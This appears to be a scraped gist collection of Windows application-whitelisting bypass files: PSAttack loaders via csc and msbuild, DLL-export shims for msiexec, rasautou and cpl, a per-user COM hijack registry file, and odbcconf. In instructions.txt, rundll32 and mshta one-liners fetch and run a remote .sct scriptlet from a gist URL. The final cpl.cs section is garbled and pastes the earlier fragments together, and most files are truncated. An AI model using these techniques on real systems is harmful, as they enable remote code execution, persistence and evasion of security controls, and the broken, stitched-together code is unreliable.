NickTyrer

## PSA64.cs
//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371"
//Based on Jared Haight work (https://github.com/jaredhaight/PSAttack)
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs"
using System;
using System.Reflection;

namespace PSA64
{
    class Program

## instructions.txt
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();

## powersct.sct
<?xml version="1.0" encoding="utf-8"?>
<package>
  <component
    id="dummy">
    <registration
      description="dummy"
      progid="dummy"
      version="1.00"
      remotable="True">
      <script

## fsharp.fsscript
#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"

open System.Management.Automation
open System.Management.Automation.Runspaces
open System

let runSpace = RunspaceFactory.CreateRunspace()
runSpace.Open()
let pipeline = runSpace.CreatePipeline()

## com_hijack.reg
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}]

[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32]
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll"

## file.rsp
REGSVR odbcconf.dll

## msiexec.cs
// msiexec /z "full path to msiexec.dll"

using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;

## PSA_MSBUILD64.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), -->
  <!-- Based on Jared Haight work (https://github.com/jaredhaight/PSAttack), -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe PSA_MSBUILD64.csproj -->
  <Target Name="PSAttack">
    <PSA_MSBUILD64 />
  </Target>
  <UsingTask
    TaskName="PSA_MSBUILD64"

## rasautou.cs
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Management.Automation;
using System.Collections.ObjectModel;
using System.Text;

// compile using unmanaged exports and referencing system.management.automation
// rasautou -d powershell.dll -p powershell -a a -e e

## cpl.cs
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;

public class Test
{
	//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371"
	//Based on Jared Haight work (https://github.com/jaredhaight/PSAttack)
	//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs"
	using System;
	using System.Reflection;

	namespace PSA64
	{
	class Program
	xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
	verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
	create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
	rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
	mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();
	<?xml version="1.0" encoding="utf-8"?>
	<package>
	<component
	id="dummy">
	<registration
	description="dummy"
	progid="dummy"
	version="1.00"
	remotable="True">
	<script
	#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"

	open System.Management.Automation
	open System.Management.Automation.Runspaces
	open System

	let runSpace = RunspaceFactory.CreateRunspace()
	runSpace.Open()
	let pipeline = runSpace.CreatePipeline()
	Windows Registry Editor Version 5.00

	[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}]

	[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32]
	@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll"
	// msiexec /z "full path to msiexec.dll"

	using System;
	using System.Runtime.InteropServices;
	using RGiesecke.DllExport;
	using System.Collections.ObjectModel;
	using System.Management.Automation;
	using System.Management.Automation.Runspaces;
	using System.Text;
	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), -->
	<!-- Based on Jared Haight work (https://github.com/jaredhaight/PSAttack), -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe PSA_MSBUILD64.csproj -->
	<Target Name="PSAttack">
	<PSA_MSBUILD64 />
	</Target>
	<UsingTask
	TaskName="PSA_MSBUILD64"